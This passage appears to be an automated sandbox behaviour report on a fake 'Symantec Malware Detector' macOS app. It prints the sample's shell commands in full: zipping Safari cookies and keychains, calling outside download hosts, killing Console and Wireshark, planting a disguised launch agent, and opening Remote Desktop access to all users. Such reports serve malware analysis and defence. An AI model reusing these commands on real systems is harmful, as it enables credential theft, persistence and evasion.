  Source: /usr/bin/perl5.18 (PID: 581); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uid
  Source: /usr/bin/perl5.18 (PID: 582); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uid
  Source: /usr/bin/perl5.18 (PID: 583); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uid
  Source: /usr/bin/perl5.18 (PID: 584); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uid
  Source: /usr/bin/perl5.18 (PID: 585); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uid
  Source: /usr/bin/perl5.18 (PID: 586); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uid
  Source: /usr/bin/perl5.18 (PID: 587); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uid
  Source: /usr/bin/perl5.18 (PID: 588); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uid
  Source: /usr/bin/perl5.18 (PID: 589); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uid
  Source: /usr/bin/perl5.18 (PID: 590); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uid
  Source: /usr/bin/perl5.18 (PID: 591); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uid
  Source: /usr/bin/perl5.18 (PID: 592); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uid
  Source: /usr/bin/perl5.18 (PID: 593); Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uid
Executes the "chmod" command used to modify permissions
  Source: /usr/bin/sudo (PID: 540); Chmod executable: /bin/chmod -> chmod -R 777 /Library/.cachedir /Library/.random
  Source: /usr/bin/sudo (PID: 548); Chmod executable: /bin/chmod -> chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)
  Source: /bin/sh (PID: 513); Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
  Source: /bin/sh (PID: 516); Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Executes the "dscl" command to retrieve a list of existing users and/or other user information
  Source: /bin/sh (PID: 553); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
  Source: /bin/sh (PID: 554); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
  Source: /bin/sh (PID: 555); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
  Source: /bin/sh (PID: 556); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
  Source: /bin/sh (PID: 557); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
  Source: /bin/sh (PID: 558); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
  Source: /bin/sh (PID: 559); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
  Source: /bin/sh (PID: 560); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
  Source: /bin/sh (PID: 561); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
  Source: /bin/sh (PID: 562); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
  Source: /bin/sh (PID: 563); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
  Source: /bin/sh (PID: 564); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
  Source: /bin/sh (PID: 565); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
  Source: /bin/sh (PID: 566); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
  Source: /bin/sh (PID: 567); Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 481)Mkdir executable: /bin/mkdir -> mkdir /tmp/.dio3we
Source: /usr/bin/sudo (PID: 538)Mkdir executable: /bin/mkdir -> mkdir -p /Library/.cachedir /Library/.random
Executes the "ping" command used for connectivity testing via ICMP
Source: /bin/sh (PID: 518)Ping executable: /sbin/ping -> ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)Ping executable: /sbin/ping -> ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)Ping executable: /sbin/ping -> ping -c 1 symeher.co
Source: /bin/sh (PID: 524)Ping executable: /sbin/ping -> ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)Ping executable: /sbin/ping -> ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)Ping executable: /sbin/ping -> ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Executes the "route" command used to read or manipulate the routing tables
Source: /bin/sh (PID: 479)Route executable: /sbin/route -> route -n get default
Opens applications that may be newly created ones
Source: /bin/sh (PID: 504)Application opened: open /tmp/xpc.app
Reads launchservices plist files
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypes
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Writes 64-bit Mach-O files to disk
Source: /usr/bin/unzip (PID: 502)File written: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/cp (PID: 541)File written: /Library/.random/xpcd.app/Contents/MacOS/xpc
Writes Mach-O files to the tmp directory
Source: /usr/bin/unzip (PID: 502)64-bit Mach-O written to tmp path: /private/tmp/xpc.app/Contents/MacOS/xpc
Writes Python files to disk
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/cb.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/ch.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/pbkdf2.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/pyDes.py
Source: /usr/bin/unzip (PID: 502)Python file created: /private/tmp/xpc.app/Contents/Resources/Schema.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/cb.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/ch.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/pyDes.py
Source: /bin/cp (PID: 541)Python file created: /Library/.random/xpcd.app/Contents/Resources/Schema.py
Writes ZIP files to disk
Source: /usr/bin/zip (PID: 485)ZIP file created: /private/tmp/.dio3we/ziRJb6aY
Source: /usr/bin/zip (PID: 487)ZIP file created: /private/tmp/.dio3we/ziPHlHPH
Writes icon files to disk
Source: /usr/bin/unzip (PID: 502)File written: /private/tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)File written: /Library/.random/xpcd.app/Contents/Resources/Finder.icns
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 483)Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /usr/bin/xargs (PID: 492)Rm executable: /bin/rm -> rm -- /tmp/.dio3we/KEYCHAINS.zip /tmp/.dio3we/SAFARI.zip
Source: /bin/sh (PID: 531)Rm executable: /bin/rm -> rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 535)Rm executable: /bin/rm -> rm -rf grace_period
Executes the "sudo" command used to execute a command as another user
Source: /bin/sh (PID: 495)Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 498)Sudo executable: /usr/bin/sudo -> sudo -S echo success
Source: /bin/sh (PID: 537)Sudo executable: /usr/bin/sudo -> sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)Sudo executable: /usr/bin/sudo -> sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 543)Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>
Source: /bin/sh (PID: 545)Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)Sudo executable: /usr/bin/sudo -> sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)Sudo executable: /usr/bin/sudo -> sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Many shell processes execute programs via the execve syscall (may be indicative of malicious behaviour)
Source: /bin/sh (PID: 479)Shell process: route -n get default
Source: /bin/sh (PID: 480)Shell process: awk /gateway/ { print $2 }
Source: /bin/sh (PID: 481)Shell process: mkdir /tmp/.dio3we
Source: /bin/sh (PID: 482)Shell process: cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 483)Shell process: rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 485)Shell process: zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 487)Shell process: zip -qr /tmp/.dio3we/KEYCHAINS.zip /Users/vreni/Library/Keychains /Library/Keychains
Source: /bin/sh (PID: 490)Shell process: find /tmp/.dio3we -type f -not -name backup_(null).zip -print0
Source: /bin/sh (PID: 491)Shell process: xargs -0 rm --
Source: /bin/sh (PID: 493)Shell process: screencapture -x /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 494)Shell process: csrutil status
Source: /bin/sh (PID: 495)Shell process: sudo -k
Source: /bin/sh (PID: 498)Shell process: sudo -S echo success
Source: /bin/sh (PID: 502)Shell process: unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/Resources/sym03_2901.dat
Source: /bin/sh (PID: 503)Shell process: xattr -c /tmp/xpc.app
Source: /bin/sh (PID: 504)Shell process: open /tmp/xpc.app
Source: /bin/sh (PID: 507)Shell process: openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 510)Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 513)Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)Shell process: curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Source: /bin/sh (PID: 518)Shell process: ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)Shell process: ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)Shell process: ping -c 1 symeher.co
Source: /bin/sh (PID: 524)Shell process: ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)Shell process: ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)Shell process: ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Source: /bin/sh (PID: 530)Shell process: cat /tmp/.sklerfde
Source: /bin/sh (PID: 531)Shell process: rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 533)Shell process: killall Console
Source: /bin/sh (PID: 534)Shell process: killall Wireshark
Source: /bin/sh (PID: 535)Shell process: rm -rf grace_period
Source: /bin/sh (PID: 537)Shell process: sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)Shell process: sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 541)Shell process: cp -R /tmp/xpc.app /Library/.random/xpcd.app
Source: /bin/sh (PID: 542)Shell process: mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd
Source: /bin/sh (PID: 543)Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string>
Source: /bin/sh (PID: 545)Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)Shell process: sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)Shell process: sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Source: /bin/sh (PID: 553)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Reads local browser cookies
Source: /usr/bin/zip (PID: 485)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 533)Killall command executed: killall Console
Source: /bin/sh (PID: 534)Killall command executed: killall Wireshark

Boot Survival:

Creates memory-persistent launch services
Source: /bin/sh (PID: 546)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchAgents/com.apple.xpcd.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /bin/sh (PID: 546)Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist

Hooking and other Techniques for Hiding and Protection:

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Source: /bin/sh (PID: 546)Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)PTRACE system call (PT_DENY_ATTACH): PID 505 denies future traces
Explicitly terminates console (used for log message viewing) processes
Source: /bin/sh (PID: 533)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processes
Source: /bin/sh (PID: 534)Kills 'Wireshark' processes: killall Wireshark

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: kern.safeboot (1.66)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: kern.safeboot (1.66)
